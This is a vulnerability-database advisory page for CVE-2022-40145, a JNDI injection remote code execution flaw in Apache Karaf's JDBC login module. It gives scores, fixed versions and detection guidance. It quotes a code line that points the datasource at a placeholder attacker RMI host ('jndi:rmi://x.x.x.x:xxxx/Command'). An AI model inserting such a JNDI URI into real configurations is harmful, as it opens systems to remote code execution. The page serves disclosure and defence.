cbcvebase.
CVE-2022-40145
published 2022-12-21

CVE-2022-40145: This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function…

PriorityP261critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
2.40%
82.0th percentile
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

Affected

4 ranges
VendorProductVersion rangeFixed in
apachekaraf< 4.3.84.3.8
apachekaraf>= 4.4.0 < 4.4.24.4.2
apache_software_foundationapache_karaf< 4.3.84.3.8
apache_software_foundationapache_karaf>= 4.4.0 < 4.4.24.4.2

Detection & IOCsextracted from sources · hover to see the quote

commandoptions.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");
  • Monitor for JNDI RMI or LDAP URIs supplied as JDBC datasource configuration values in Apache Karaf JAAS JDBC login module options (JDBCUtils.DATASOURCE), particularly schemes such as jndi:rmi:// or jndi:ldap:// pointing to external hosts.
  • Audit calls to InitialContext.lookup(jndiName) within org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource for unsanitised, externally-controlled JNDI names — absence of input filtering here is the root cause of the RCE.
  • Flag outbound RMI (TCP/1099 or high ephemeral RMI ports) and LDAP (TCP/389, TCP/636) connections originating from Apache Karaf JVM processes, which may indicate JNDI injection exploitation in progress.
  • ·Exploitation requires the attacker to already control the target LDAP/RMI server referenced in the JNDI URI; this is a prerequisite that reduces exploitability compared to fully unauthenticated RCE.
  • ·All Apache Karaf versions up to and including 4.4.1 and 4.3.7 are affected; versions 4.4.2 and 4.3.8 contain the fix.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_redhat9.8CRITICAL
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.